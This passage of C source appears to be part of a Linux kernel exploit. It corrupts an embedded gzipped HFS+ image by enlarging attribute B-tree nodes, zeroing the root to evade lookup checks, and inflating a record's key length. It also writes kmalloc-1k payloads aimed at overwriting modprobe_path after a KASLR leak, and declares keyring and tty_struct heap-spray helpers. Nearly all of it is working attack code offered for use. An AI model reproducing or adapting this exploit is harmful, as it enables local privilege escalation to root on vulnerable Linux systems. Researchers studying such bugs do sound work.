    CMD_FREE_PAGE,
    CMD_EXIT,
};

/* Tpacket version for setsockopt */
enum tpacket_versions {
    TPACKET_V1,
    TPACKET_V2,
    TPACKET_V3,
};

typedef int32_t key_serial_t;

#define CHUNK 16384

#define __packed __attribute__((packed))

#define HFSPLUS_ATTR_MAX_STRLEN 127

typedef __be32 hfsplus_cnid;
typedef __be16 hfsplus_unichr;
typedef __u32 u32;
typedef __u16 u16;
typedef __u8 u8;
typedef __s8 s8;

struct write4_payload {
    void *next;
    void *prev;
    uint8_t name_offset;
} __attribute__((packed));

uint64_t get_keyring_leak(key_serial_t *id_buffer, uint32_t id_buffer_size);

void release_keys(key_serial_t *id_buffer, uint32_t id_buffer_size);

static inline key_serial_t add_key(const char *type, const char *description, const void *payload, size_t plen, key_serial_t ringid)
{
    return syscall(__NR_add_key, type, description, payload, plen, ringid);
}

static inline long keyctl(int operation, unsigned long arg2, unsigned long arg3, unsigned long arg4, unsigned long arg5)
{
    return syscall(__NR_keyctl, operation, arg2, arg3, arg4, arg5);
}

void set_cpu_affinity(int cpu_n, pid_t pid);

void spray_tty_struct(int num);

key_serial_t *spray_keyring(uint32_t spray_size, uint32_t offset);


struct hfsplus_attr_unistr {
    __be16 length;
    hfsplus_unichr unicode[HFSPLUS_ATTR_MAX_STRLEN];
} __packed;

/* HFS+ attributes tree key */
struct hfsplus_attr_key {
    __be16 key_len;
    __be16 pad;
    hfsplus_cnid cnid;
    __be32 start_block;
    struct hfsplus_attr_unistr key_name;
} __packed;

#define HFSPLUS_ATTR_KEYLEN sizeof(struct hfsplus_attr_key)

/* A single contiguous area of a file */
struct hfsplus_extent {
    __be32 start_block;
    __be32 block_count;
} __packed;
typedef struct hfsplus_extent hfsplus_extent_rec[8];

/* Information for a "Fork" in a file */
struct hfsplus_fork_raw {
    __be64 total_size;
    __be32 clump_size;
    __be32 total_blocks;
    hfsplus_extent_rec extents;
} __packed;

/* HFS+ Volume Header */
struct hfsplus_vh {
    __be16 signature;
    __be16 version;
    __be32 attributes;
    __be32 last_mount_vers;
    u32 reserved;

    __be32 create_date;
    __be32 modify_date;
    __be32 backup_date;
    __be32 checked_date;

    __be32 file_count;
    __be32 folder_count;

    __be32 blocksize;
    __be32 total_blocks;
    __be32 free_blocks;

    __be32 next_alloc;
    __be32 rsrc_clump_sz;
    __be32 data_clump_sz;
    hfsplus_cnid next_cnid;

    __be32 write_count;
    __be64 encodings_bmp;

    u32 finder_info[8];

    struct hfsplus_fork_raw alloc_file;
    struct hfsplus_fork_raw ext_file;
    struct hfsplus_fork_raw cat_file;
    struct hfsplus_fork_raw attr_file;
    struct hfsplus_fork_raw start_file;
} __packed;


/* HFS+ BTree node descriptor */
struct hfs_bnode_desc {
    __be32 next;
    __be32 prev;
    s8 type;
    u8 height;
    __be16 num_recs;
    u16 reserved;
} __packed;

/* HFS+ BTree node types */
#define HFS_NODE_INDEX 0x00 /* An internal (index) node */
#define HFS_NODE_HEADER 0x01 /* The tree header node (node 0) */
#define HFS_NODE_MAP 0x02 /* Holds part of the bitmap of used nodes */
#define HFS_NODE_LEAF 0xFF /* A leaf (ndNHeight==1) node */

/* HFS+ BTree header */
struct hfs_btree_header_rec {
    __be16 depth;
    __be32 root;
    __be32 leaf_count;
    __be32 leaf_head;
    __be32 leaf_tail;
    __be16 node_size;
    __be16 max_key_len;
    __be32 node_count;
    __be32 free_nodes;
    u16 reserved1;
    __be32 clump_size;
    u8 btree_type;
    u8 key_type;
    __be32 attributes;
    u32 reserved3[16];
} __packed;

#define HFS_TREE_BIGKEYS 2
#define HFS_TREE_VARIDXKEYS 4


/* Gzipped vanilla HFS+ that we are going to corrupt */
unsigned char vanilla_hfs_bin[] = {
  0x1f, 0x8b, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x5d, 0x90,
  0x79, 0x54, 0x12, 0x06, 0x00, 0xc6, 0xc1, 0xca, 0xb9, 0xe9, 0x6c, 0x79,
  0x65, 0xb4, 0xe4, 0xe5, 0xc9, 0x4c, 0xd3, 0xcc, 0x7c, 0x6a, 0xa5, 0x5b,
  0x4c, 0x4b, 0x9c, 0x4f, 0x53, 0xf7, 0x3c, 0x40, 0xb7, 0x28, 0x73, 0xa4,
  0x50, 0x1e, 0x80, 0x07, 0x1e, 0xaf, 0x56, 0x21, 0x4d, 0xe9, 0x52, 0xd3,
  0x54, 0x40, 0x43, 0x49, 0xc4, 0x32, 0x52, 0x1a, 0x82, 0x69, 0x86, 0x28,
  0x1e, 0x25, 0x79, 0x2b, 0xa0, 0x79, 0xe0, 0x81, 0x52, 0x98, 0x47, 0x5e,
  0xec, 0xad, 0xf7, 0xb6, 0xb4, 0xef, 0xdf, 0xdf, 0x1f, 0xdf, 0xef, 0xfb,
  0xc0, 0x37, 0xb4, 0x00, 0x9f, 0xb2, 0x6d, 0x76, 0x08, 0xee, 0x17, 0x88,
  0x05, 0x08, 0xdf, 0x67, 0x3e, 0x95, 0x18, 0xdb, 0xfd, 0x40, 0x32, 0x22,
  0xfe, 0x05, 0x31, 0xb8, 0x36, 0x40, 0xb5, 0x1f, 0x8e, 0xa0, 0x82, 0x74,
  0xaa, 0xf3, 0x03, 0xdf, 0x35, 0x69, 0xdd, 0x45, 0x12, 0x21, 0xa6, 0x15,
  0x1a, 0x97, 0xd3, 0xf5, 0xa4, 0xb8, 0x67, 0xf7, 0x46, 0xfe, 0xdc, 0x4e,
  0x32, 0xa5, 0x69, 0x19, 0x13, 0x2b, 0x5f, 0x58, 0xfb, 0x73, 0x4d, 0x8d,
  0xf5, 0x68, 0x5a, 0x2f, 0xc6, 0x40, 0xa0, 0xa5, 0xc1, 0x58, 0xa6, 0xe4,
  0x9c, 0x90, 0x53, 0x74, 0xa1, 0xcc, 0xe5, 0xcd, 0x87, 0xf5, 0x63, 0x85,
  0x79, 0x71, 0x13, 0x6d, 0x4b, 0x05, 0x72, 0xd9, 0x5a, 0x99, 0xc9, 0xed,
  0x53, 0xe2, 0xcb, 0x4d, 0xd1, 0x7a, 0x7c, 0x85, 0x92, 0x2f, 0x88, 0x84,
  0x53, 0xd5, 0x4d, 0xdf, 0x16, 0xb9, 0xd5, 0xd5, 0x6a, 0x68, 0xa4, 0xd0,
  0xd9, 0x1a, 0x7c, 0x3c, 0x29, 0xf4, 0x82, 0x12, 0x13, 0x3e, 0x72, 0xec,
  0xa7, 0xa1, 0xbe, 0x61, 0x4a, 0xb6, 0x92, 0xe7, 0x42, 0x85, 0xe1, 0xd2,
  0x72, 0x86, 0x18, 0x8e, 0x96, 0x6d, 0xa9, 0x39, 0x27, 0x5f, 0x1d, 0x95,
  0x5b, 0x16, 0xd8, 0x9b, 0x18, 0xc0, 0x15, 0x41, 0x16, 0x0a, 0x29, 0x07,
  0x62, 0xd9, 0x1c, 0x37, 0xed, 0xd8, 0x92, 0x70, 0x80, 0xae, 0x88, 0x6d,
  0x23, 0x8a, 0xc5, 0x76, 0x07, 0x9d, 0x88, 0x67, 0xd1, 0xac, 0x39, 0xe7,
  0x3e, 0x6b, 0x7a, 0x46, 0x71, 0xdd, 0xf4, 0x75, 0x9f, 0xa8, 0x01, 0x5f,
  0xf8, 0x75, 0xc8, 0x04, 0xa5, 0x35, 0x24, 0xad, 0xaa, 0x8f, 0xcd, 0xc0,
  0x35, 0x9f, 0xf1, 0x11, 0xc3, 0x42, 0x56, 0x48, 0xe3, 0x2e, 0x74, 0xaf,
  0x22, 0x18, 0x96, 0x55, 0x3e, 0xbd, 0xbb, 0x77, 0xdb, 0x0e, 0x9a, 0xc9,
  0xfc, 0x00, 0x39, 0x37, 0x9b, 0xbc, 0xef, 0x9b, 0xc3, 0x5e, 0xf9, 0x6a,
  0xe7, 0x28, 0x41, 0x7b, 0x17, 0x07, 0xa7, 0x83, 0xc2, 0xec, 0x8e, 0x7e,
  0x1e, 0x33, 0x8e, 0xae, 0xad, 0x69, 0x60, 0xde, 0xc8, 0x4d, 0x65, 0x8b,
  0xce, 0x77, 0x06, 0xdf, 0x3a, 0x15, 0x30, 0x35, 0x7e, 0x6c, 0xaa, 0xa2,
  0x89, 0xfa, 0xb8, 0xc3, 0xf7, 0x10, 0xdc, 0x5c, 0x0f, 0x75, 0x9c, 0x19,
  0x24, 0x5f, 0x5d, 0x76, 0x2f, 0x94, 0x82, 0x56, 0x5e, 0xf3, 0xf0, 0xa5,
  0xc9, 0x9e, 0xc9, 0x09, 0xb4, 0xd5, 0x9a, 0x69, 0xaf, 0x57, 0x17, 0x3d,
  0xf2, 0xe3, 0x11, 0xb0, 0xcc, 0x9b, 0xee, 0xc1, 0x83, 0xb5, 0x7e, 0xdb,
  0x87, 0xd5, 0xe6, 0xb1, 0x90, 0x94, 0x96, 0x01, 0x61, 0xdc, 0xce, 0x45,
  0x6b, 0xe8, 0xac, 0xa4, 0x92, 0xd1, 0x03, 0x6e, 0xce, 0x1b, 0xe9, 0x63,
  0x66, 0x55, 0xcb, 0xe2, 0x46, 0x33, 0x08, 0x58, 0x65, 0xf3, 0x6e, 0xdf,
  0x44, 0xbe, 0xf5, 0x3e, 0x02, 0xce, 0xd2, 0x65, 0x10, 0x7b, 0xa6, 0xb4,
  0xd5, 0xa9, 0x3d, 0x2c, 0x57, 0xb9, 0x4a, 0x9e, 0xab, 0x42, 0xc7, 0x42,
  0xf0, 0x1b, 0x8c, 0xa8, 0xd0, 0x55, 0x5d, 0x72, 0x85, 0x59, 0xeb, 0x53,
  0xbb, 0xf6, 0x29, 0x54, 0x05, 0x98, 0x51, 0x11, 0xed, 0xff, 0xb1, 0x74,
  0x95, 0x1e, 0xa4, 0x09, 0x26, 0x0f, 0x3a, 0x2b, 0x45, 0xa5, 0x2f, 0x44,
  0xe5, 0xac, 0xe3, 0x42, 0xca, 0x58, 0xf9, 0x62, 0xb8, 0xae, 0xb2, 0xf2,
  0x92, 0xcd, 0x51, 0xfd, 0x65, 0x86, 0x40, 0x21, 0xf0, 0xb6, 0xb3, 0x38,
  0xc9, 0xe8, 0x69, 0x81, 0x46, 0x37, 0x56, 0x23, 0x69, 0x75, 0x26, 0x80,
  0xff, 0x52, 0xff, 0xdb, 0xcf, 0x84, 0xa5, 0x7e, 0x9f, 0x99, 0x59, 0x65,
  0x9a, 0x83, 0x8b, 0xff, 0x7d, 0x87, 0xce, 0x97, 0xdd, 0xa3, 0x7e, 0x37,
  0xab, 0xaa, 0xba, 0x96, 0x2e, 0x3d, 0x9f, 0xcc, 0x9e, 0x62, 0xfa, 0xf2,
  0x6b, 0xe0, 0x8e, 0x98, 0xb7, 0x0c, 0x0b, 0x4d, 0xd1, 0x7b, 0xa5, 0xa8,
  0xb0, 0x92, 0x05, 0x92, 0xe7, 0x5f, 0x4a, 0x46, 0xe7, 0x36, 0xb0, 0x25,
  0xa7, 0xfb, 0xcd, 0x42, 0xd9, 0xf2, 0xb9, 0x0f, 0xfd, 0x79, 0xcf, 0xdc,
  0x47, 0xe6, 0xaf, 0xac, 0x62, 0x16, 0x32, 0xb3, 0xb0, 0xc4, 0x14, 0x3e,
  0xab, 0x83, 0xe6, 0xe7, 0xe6, 0x35, 0xb9, 0x53, 0xe3, 0x53, 0x81, 0x1a,
  0x31, 0x2a, 0x19, 0x7e, 0x59, 0x93, 0x45, 0xf1, 0xc6, 0x5b, 0x2c, 0xd9,
  0xe6, 0x66, 0x56, 0xaa, 0x96, 0x55, 0x53, 0x9d, 0xa9, 0x42, 0xbf, 0x4c,
  0xf9, 0x5a, 0x03, 0xa8, 0x44, 0xce, 0x31, 0x33, 0x0c, 0x0f, 0xd3, 0xce,
  0x3f, 0x71, 0x1b, 0xb9, 0xde, 0x08, 0x5e, 0x2e, 0x4f, 0x2e, 0xaf, 0xab,
  0x06, 0x3b, 0x84, 0xc6, 0xc9, 0x25, 0x0d, 0x56, 0xb4, 0xaf, 0x17, 0x32,
  0x3c, 0x44, 0xb4, 0x1d, 0xa2, 0x86, 0xac, 0x96, 0x09, 0x4c, 0xc0, 0x62,
  0x38, 0x66, 0xe6, 0x83, 0xd8, 0xd1, 0xd5, 0xf7, 0x61, 0x08, 0xcf, 0x2a,
  0x30, 0xc9, 0x33, 0xd1, 0xb9, 0x83, 0xde, 0x5d, 0xc9, 0xe5, 0xed, 0xc7,
  0xce, 0x94, 0x8c, 0xc1, 0xfd, 0xe9, 0xeb, 0x57, 0xcd, 0xfa, 0xe1, 0x84,
  0xe8, 0xf3, 0xf8, 0xc8, 0x6e, 0x43, 0xa9, 0x5b, 0x71, 0x78, 0xa2, 0x78,
  0x23, 0x18, 0x7a, 0x45, 0x56, 0x26, 0x9d, 0x5e, 0x53, 0x3d, 0xd1, 0x65,
  0xee, 0x5d, 0x07, 0x0a, 0xad, 0xf5, 0x53, 0x21, 0xf9, 0x77, 0xcc, 0x29,
  0x7b, 0x82, 0x10, 0x01, 0x46, 0xaa, 0x5f, 0x17, 0x2e, 0x93, 0x22, 0xe6,
  0xc2, 0x54, 0x54, 0x5d, 0x75, 0xe4, 0x1c, 0xa9, 0xc8, 0x27, 0xc7, 0xdb,
  0x9d, 0xc7, 0x78, 0xe8, 0x4f, 0x40, 0x0c, 0xf7, 0xca, 0x10, 0xc3, 0x31,
  0xd8, 0xc4, 0x45, 0x25, 0xdc, 0xf6, 0x4a, 0x75, 0xbb, 0xa7, 0xd5, 0xbc,
  0xc3, 0xd8, 0xfe, 0xb2, 0xb4, 0x99, 0xd6, 0x67, 0xf8, 0xba, 0x47, 0x1b,
  0xbd, 0x87, 0x4c, 0x3b, 0x8f, 0xec, 0xe5, 0x74, 0xb1, 0x77, 0xf1, 0x83,
  0x6a, 0x23, 0x1f, 0xe0, 0xb0, 0xd2, 0xae, 0x5f, 0x0c, 0x57, 0x94, 0x9f,
  0xe6, 0xa6, 0xa7, 0x41, 0x63, 0x8a, 0x82, 0xa3, 0xed, 0x09, 0x23, 0x0f,
  0x5a, 0x6e, 0xd1, 0x23, 0x80, 0xff, 0xff, 0x0c, 0x48, 0x57, 0x73, 0xf5,
  0x0e, 0x07, 0x64, 0x60, 0x0c, 0xed, 0xa9, 0x8f, 0x6f, 0x18, 0xb9, 0x6a,
  0x7e, 0x26, 0x80, 0xc9, 0x76, 0x7b, 0x9b, 0x7a, 0x04, 0x67, 0x87, 0x1f,
  0x2a, 0xca, 0xe2, 0x84, 0x70, 0x13, 0x00, 0xf0, 0x43, 0x38, 0x08, 0xb2,
  0x18, 0x0d, 0x7c, 0x5b, 0x9d, 0x6a, 0x94, 0x77, 0xa2, 0x77, 0x0b, 0x1a,
  0x27, 0x09, 0x34, 0x1b, 0xe1, 0x00, 0x2b, 0x9f, 0x2c, 0x1b, 0x9f, 0x49,
  0xe3, 0x4d, 0x84, 0xca, 0xf9, 0xb7, 0x68, 0xee, 0xf7, 0x74, 0xe0, 0xd5,
  0xb0, 0xa7, 0xaf, 0x0f, 0x6d, 0x22, 0x3f, 0x5e, 0xbc, 0x76, 0x06, 0x38,
  0xc1, 0xb5, 0x4d, 0x87, 0xc1, 0x0f, 0xec, 0xfa, 0x42, 0x81, 0x3b, 0x9e,
  0x74, 0x17, 0xa3, 0xfd, 0xdd, 0xa3, 0x05, 0x76, 0xb3, 0x01, 0x77, 0x0b,
  0xb2, 0x0d, 0xb2, 0x71, 0x32, 0x96, 0x6a, 0x38, 0xa3, 0x62, 0xcf, 0xa1,
  0xbe, 0xd0, 0xcb, 0xbe, 0x97, 0x07, 0x8b, 0xff, 0x6a, 0x9b, 0x0e, 0x44,
  0x51, 0x7c, 0x35, 0x6b, 0xd3, 0x58, 0x40, 0xd2, 0x61, 0x1d, 0x6d, 0xfb,
  0x5e, 0x34, 0x30, 0x70, 0x20, 0x34, 0xe3, 0x0b, 0x85, 0x1e, 0xdb, 0xde,
  0x92, 0x78, 0x78, 0x7a, 0x02, 0x8b, 0xe2, 0x51, 0xfa, 0xfa, 0xc8, 0x16,
  0xf4, 0x37, 0xb2, 0xaa, 0xe1, 0x9d, 0x51, 0xbd, 0xd7, 0x1d, 0x33, 0x6f,
  0xfd, 0xad, 0x7a, 0xb3, 0xd2, 0x12, 0x6e, 0xfc, 0xfc, 0x69, 0x33, 0x9e,
  0xc7, 0x82, 0xc3, 0x59, 0xe8, 0x28, 0x4f, 0xfb, 0x63, 0xa2, 0xe7, 0x5e,
  0x12, 0x12, 0x59, 0xe1, 0x7a, 0x72, 0xcf, 0xd1, 0x02, 0xb7, 0xee, 0x48,
  0x10, 0x5a, 0x25, 0x25, 0xeb, 0xeb, 0x36, 0x0d, 0x3a, 0x2a, 0x16, 0x7a,
  0x56, 0x0c, 0xc8, 0x06, 0x9f, 0x6d, 0xea, 0x65, 0xaa, 0x89, 0xd1, 0xb5,
  0x2a, 0x49, 0x0e, 0x1d, 0xd8, 0x8a, 0x4c, 0x83, 0xa1, 0x96, 0xb2, 0x9d,
  0x2e, 0xd6, 0xc9, 0x1c, 0xa1, 0x85, 0x7a, 0x04, 0xe9, 0x93, 0x52, 0x3c,
  0xc2, 0xcb, 0xf3, 0x0f, 0x7e, 0x12, 0x2e, 0x6e, 0x88, 0xbe, 0xd1, 0x13,
  0x88, 0x22, 0x42, 0x6b, 0x63, 0x98, 0xae, 0x02, 0xb4, 0x02, 0x5c, 0x78,
  0x04, 0x5b, 0x74, 0x70, 0xd0, 0x97, 0xb0, 0x7e, 0x2d, 0x45, 0xc0, 0xcd,
  0x30, 0xbc, 0x5e, 0xce, 0x7d, 0xf3, 0x96, 0x45, 0xf8, 0xfe, 0xbe, 0x5b,
  0xc2, 0x86, 0x53, 0x0b, 0xe5, 0x61, 0x41, 0xa2, 0x8c, 0xae, 0x06, 0x02,
  0xfe, 0x01, 0x5a, 0x8c, 0xfd, 0x33, 0x35, 0x05, 0x00, 0x00
};
unsigned int vanilla_hfs_bin_len = 1258;


/* HFS+ epoch starts on January 1, 1904 */
#define HFSPLUS_EPOCH_DIFF 2082844800 /* Difference between HFS+ and Unix epoch in seconds (1904-1970) */

/* Function to convert HFS+ timestamp to Unix timestamp and then to a human-readable date */
void hfsplus_to_date(unsigned int hfsplus_timestamp)
{
    /* Convert HFS+ timestamp to Unix timestamp (cast first so pre-1970 dates do not wrap) */
    time_t unix_timestamp = (time_t)hfsplus_timestamp - HFSPLUS_EPOCH_DIFF;

    /* Convert the Unix timestamp to local time */
    struct tm *tm_info = localtime(&unix_timestamp);

    if (tm_info == NULL) {
        printf("Failed to convert timestamp\n");
        return;
    }

    /* Output the formatted date */
    char buffer[80];

    strftime(buffer, sizeof(buffer), "%Y-%m-%d %H:%M:%S", tm_info);
    printf("%s\n", buffer);
}

void parse_tree(struct hfs_btree_header_rec *tree)
{
    /* The node descriptor sits immediately before the B-tree header record */
    struct hfs_bnode_desc *header_node = (struct hfs_bnode_desc *)((unsigned char *)tree - sizeof(struct hfs_bnode_desc));

    printf("\tHeader node next: 0x%x\n", be32toh(header_node->next));
    printf("\tHeader node prev: 0x%x\n", be32toh(header_node->prev));
    printf("\tHeader node type: ");
    if (header_node->type == HFS_NODE_HEADER)
        printf("HFS_NODE_HEADER\n");
    else
        printf("0x%x\n", header_node->type);

    printf("\tHeader node number of records: 0x%x\n", be16toh(header_node->num_recs));

    printf("\tDepth: 0x%x\n", be16toh(tree->depth));
    printf("\tRoot: 0x%x\n", be32toh(tree->root));
    printf("\tNode size: 0x%x\n", be16toh(tree->node_size));
    printf("\tMax key length: 0x%x\n", be16toh(tree->max_key_len));
    printf("\tNode count: 0x%x\n", be32toh(tree->node_count));
    printf("\tAttributes:\n");
    if (be32toh(tree->attributes) & HFS_TREE_BIGKEYS)
        printf("\t\tHFS_TREE_BIGKEYS\n");
    if (be32toh(tree->attributes) & HFS_TREE_VARIDXKEYS)
        printf("\t\tHFS_TREE_VARIDXKEYS\n");
}


void parse_volume(const unsigned char *hfs_buffer, size_t len)
{
    /* The HFS+ volume header lives at byte offset 0x400 of the image */
    struct hfsplus_vh *hfs_vh = (struct hfsplus_vh *)(hfs_buffer+0x400);

    printf("[+] Basic information about hfs+ volume\n");
    printf("\tSignature: 0x%x\n", be16toh(hfs_vh->signature));
    printf("\tVersion: 0x%x\n", be16toh(hfs_vh->version));
    printf("\tCreation date: ");
    hfsplus_to_date(be32toh(hfs_vh->create_date));
    printf("\tBlock size: 0x%x\n", be32toh(hfs_vh->blocksize));
    printf("\tTotal blocks: 0x%x\n", be32toh(hfs_vh->total_blocks));
    printf("\tNext cnid: 0x%x\n", be32toh(hfs_vh->next_cnid));


    printf("[+] Checking catalog and attribute btrees\n");
    printf("\tCatalog start block: 0x%x\n", be32toh(hfs_vh->cat_file.extents->start_block));
    printf("\tCatalog block count: 0x%x\n", be32toh(hfs_vh->cat_file.extents->block_count));

    printf("\tAttribute start block: 0x%x\n", be32toh(hfs_vh->attr_file.extents->start_block));
    printf("\tAttribute block count: 0x%x\n", be32toh(hfs_vh->attr_file.extents->block_count));

    size_t blocksize = be32toh(hfs_vh->blocksize);

    /* Catalog tree: use the catalog fork's first extent, not the attribute fork's */
    size_t cat_tree_start_address = be32toh(hfs_vh->cat_file.extents->start_block) * blocksize;

    cat_tree_start_address += sizeof(struct hfs_bnode_desc);
    struct hfs_btree_header_rec *cat_tree = (struct hfs_btree_header_rec *)(hfs_buffer+cat_tree_start_address);


    size_t attr_tree_start_address = be32toh(hfs_vh->attr_file.extents->start_block) * blocksize;

    attr_tree_start_address += sizeof(struct hfs_bnode_desc);
    struct hfs_btree_header_rec *attr_tree = (struct hfs_btree_header_rec *)(hfs_buffer+attr_tree_start_address);


    printf("[+] Parsing basic stuff about catalog file\n");
    parse_tree(cat_tree);

    printf("[+] Parsing basic stuff about attribute file\n");
    parse_tree(attr_tree);

}


void resize_nodes(unsigned char *hfs_buffer, size_t len)
{
    uint8_t footer_node[] = {
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x77, 0x00,
    0x76, 0x00, 0x75, 0x00, 0x74, 0x42, 0x00, 0x0e
    };

    struct hfsplus_vh *hfs_vh = (struct hfsplus_vh *)(hfs_buffer+0x400);
    size_t blocksize = be32toh(hfs_vh->blocksize);
    size_t attr_tree_start_address_base = be32toh(hfs_vh->attr_file.extents->start_block) * blocksize;
    size_t attr_tree_start_address = attr_tree_start_address_base + sizeof(struct hfs_bnode_desc);
    struct hfs_btree_header_rec *attr_tree = (struct hfs_btree_header_rec *)(hfs_buffer+attr_tree_start_address);

    printf("[+] Resizing attribute tree nodes to make some space for machinery\n");
    printf("\tNode size: 0x%x\n", be16toh(attr_tree->node_size));

    /* Let's have a bigger node size so we can fit our payloads nicely */
    attr_tree->node_size = htobe16(0x8000);

    printf("\tNode size (corrupted): 0x%x\n", be16toh(attr_tree->node_size));

    /* The node footer has to go to the new place */
    unsigned char *dest_address = hfs_buffer + attr_tree_start_address_base + (0x8000-0x10);
    unsigned char *src_address = hfs_buffer + attr_tree_start_address_base + (0x2000-0x10);

    printf("\tOriginal footer at: 0x%lx\n", (unsigned long)src_address);
    printf("\tNew footer at: 0x%lx\n", (unsigned long)dest_address);

    printf("\tOriginal footer at (relative): 0x%lx\n", (unsigned long)src_address - (unsigned long)hfs_buffer);
    printf("\tNew footer at (relative): 0x%lx\n", (unsigned long)dest_address - (unsigned long)hfs_buffer);

    memcpy(dest_address, src_address, 0x10);

    /* The target node footer is given by us */
    unsigned char *dest_address_node = hfs_buffer + attr_tree_start_address_base + (2 * 0x8000 - 0x10);

    memcpy(dest_address_node, &footer_node, 0x10);


    /* The attribute records have to move to the start of the resized node as well */
    unsigned char *src_address_data = hfs_buffer + attr_tree_start_address_base + 0x2000;
    unsigned char *dest_address_data = hfs_buffer + attr_tree_start_address_base + 0x8000;

    printf("\tOriginal attribute records at: 0x%lx\n", (unsigned long)src_address_data);
    printf("\tNew attribute records at: 0x%lx\n", (unsigned long)dest_address_data);

    memcpy(dest_address_data, src_address_data, 0x200);
}

void remove_root(unsigned char *hfs_buffer, size_t len)
{
    struct hfsplus_vh *hfs_vh = (struct hfsplus_vh *)(hfs_buffer+0x400);
    size_t blocksize = be32toh(hfs_vh->blocksize);
    size_t attr_tree_start_address_base = be32toh(hfs_vh->attr_file.extents->start_block) * blocksize;
    size_t attr_tree_start_address = attr_tree_start_address_base + sizeof(struct hfs_bnode_desc);
    struct hfs_btree_header_rec *attr_tree = (struct hfs_btree_header_rec *)(hfs_buffer+attr_tree_start_address);

    printf("[+] Removing root to bypass hfs_brec_find checks\n");

    printf("\tRoot: 0x%x\n", be32toh(attr_tree->root));

    /* Let's zero out the root to bypass checks */
    attr_tree->root = htobe32(0x0);

    /* root is a 32-bit big-endian field, so read it back with be32toh */
    printf("\tRoot (corrupted): 0x%x\n", be32toh(attr_tree->root));
}


void corrupt_key_len(unsigned char *hfs_buffer, size_t len, uint16_t new_length)
{
    struct hfsplus_vh *hfs_vh = (struct hfsplus_vh *)(hfs_buffer+0x400);
    size_t blocksize = be32toh(hfs_vh->blocksize);
    size_t attr_tree_start_address_base = be32toh(hfs_vh->attr_file.extents->start_block) * blocksize;
    size_t attr_tree_start_address = attr_tree_start_address_base + sizeof(struct hfs_bnode_desc);
    struct hfs_btree_header_rec *attr_tree = (struct hfs_btree_header_rec *)(hfs_buffer+attr_tree_start_address);
    unsigned char *address_node = hfs_buffer + attr_tree_start_address_base + 0x8000;

    printf("[+] Corrupting HFS attribute record key length\n");

    struct hfs_bnode_desc *first_node = (struct hfs_bnode_desc *)address_node;

    printf("\tNode next: 0x%x\n", be32toh(first_node->next));
    printf("\tNode prev: 0x%x\n", be32toh(first_node->prev));
    printf("\tNode type: ");
    if (first_node->type == HFS_NODE_HEADER)
        printf("HFS_NODE_HEADER\n");
    else
        printf("0x%x\n", first_node->type);

    printf("\tNode number of records: 0x%x\n", be16toh(first_node->num_recs));

    struct hfsplus_attr_key *first_key = (struct hfsplus_attr_key *)(address_node + sizeof(struct hfs_bnode_desc));

    printf("\tKey length (current): 0x%x\n", be16toh(first_key->key_len));
    first_key->key_len = htobe16(new_length);

    printf("\tKey length (corrupted): 0x%x\n", be16toh(first_key->key_len));
}


void write_payload(unsigned char *hfs_buffer, size_t len, uint8_t *payload, uint16_t payload_length)
{
    struct hfsplus_vh *hfs_vh = (struct hfsplus_vh *)(hfs_buffer+0x400);
    size_t blocksize = be32toh(hfs_vh->blocksize);
    size_t attr_tree_start_address_base = be32toh(hfs_vh->attr_file.extents->start_block) * blocksize;
    size_t attr_tree_start_address = attr_tree_start_address_base + sizeof(struct hfs_bnode_desc);
    struct hfs_btree_header_rec *attr_tree = (struct hfs_btree_header_rec *)(hfs_buffer+attr_tree_start_address);
    unsigned char *address_node = hfs_buffer + attr_tree_start_address_base + 0x8000;
    struct hfsplus_attr_key *first_key = (struct hfsplus_attr_key *)(address_node + sizeof(struct hfs_bnode_desc));

    printf("[+] Writing kmalloc-1k payload\n");

    /* Make some 'A' padding */
    memset((void *)first_key + 0xd7, 0x41, 4*0x400);

    uint8_t *address = (uint8_t *)(address_node + sizeof(struct hfs_bnode_desc) + 0x400);

    memcpy(address, payload, payload_length);
}

void hack_hfs_keyring(unsigned char *hfs_buffer, size_t len, uint64_t dummy)
{
    /* Let's check some basic information about our volume */
    parse_volume(hfs_buffer, len);

    /* First, we hack the attribute B-tree a little bit */
    resize_nodes(hfs_buffer, len);

    /* Remove root */
    remove_root(hfs_buffer, len);

    /* Corrupt key length */
    corrupt_key_len(hfs_buffer, len, 0x418 - 2);

    uint8_t payload[24] = {
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0xff, 0xff, 0x53, 0x53, 0x53, 0x53, 0x53, 0x53
    };

    uint16_t payload_len = sizeof(payload);

    /* Write kmalloc-1k payload */
    write_payload(hfs_buffer, len, payload, payload_len);
}

void hack_hfs_modprobe_one(unsigned char *hfs_buffer, size_t len, uint64_t kaslr_base)
{
    /* Let's check some basic information about our volume */
    parse_volume(hfs_buffer, len);

    /* First, we hack the attribute B-tree a little bit */
    resize_nodes(hfs_buffer, len);

    /* Remove root */
    remove_root(hfs_buffer, len);

    /* Corrupt key length */
    /* Pass the intended length minus 2: hfs_bnode_read_key() adds 2 back (fs/hfsplus/bnode.c#L66) */
    corrupt_key_len(hfs_buffer, len, 0x410 - 2);

/*
    uint8_t payload[24] = {
    0x3c, 0xf6, 0xb3, 0x82, 0xff, 0xff, 0xff, 0xff,
    0x2f, 0x62, 0x67, 0x70, 0x81, 0x88, 0xff, 0xff, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
    };
*/

/* 00000000: 38f6 b382 ffff ffff 2f74 6d70 8188 ffff  8......./tmp.... */
    uint8_t payload[16] = {
    0x38, 0xf6, 0xb3, 0x82, 0xff, 0xff, 0xff, 0xff,
    0x2f, 0x74, 0x6d, 0x70, 0x81, 0x88, 0xff, 0xff
    };

    if (kaslr_base) {
        /* (gdb) set *(long*)(0xffff8881019be000) = 0xffffffff82b3f638 */
        /* (gdb) set *(long*)(0xffff8881019be008) = 0xffff8881706d742f */
        /*
         * #define MODPROBE_ADDR_ONE 0xffffffff82b3f638
         * #define MODPROBE_ADDR_TWO 0xffffffff82b3f63c
         *
         * #define KERNEL_BASE 0xffffffff81000000
         */

        printf("[+] Fixing up first payload with kaslr base: %lx\n", kaslr_base);
        /* Rebase the static address onto the recovered KASLR base, then store it little-endian */
        uint64_t target = MODPROBE_ADDR_ONE - KERNEL_BASE + kaslr_base;
        for (int i = 0; i < 8; i++) {
            payload[i] = (uint8_t)((target >> (8 * i)) & 0xFF);
        }
    }


    uint16_t payload_len = sizeof(payload);

    /* Write kmalloc-1k payload */
    write_payload(hfs_buffer, len, payload, payload_len);
}

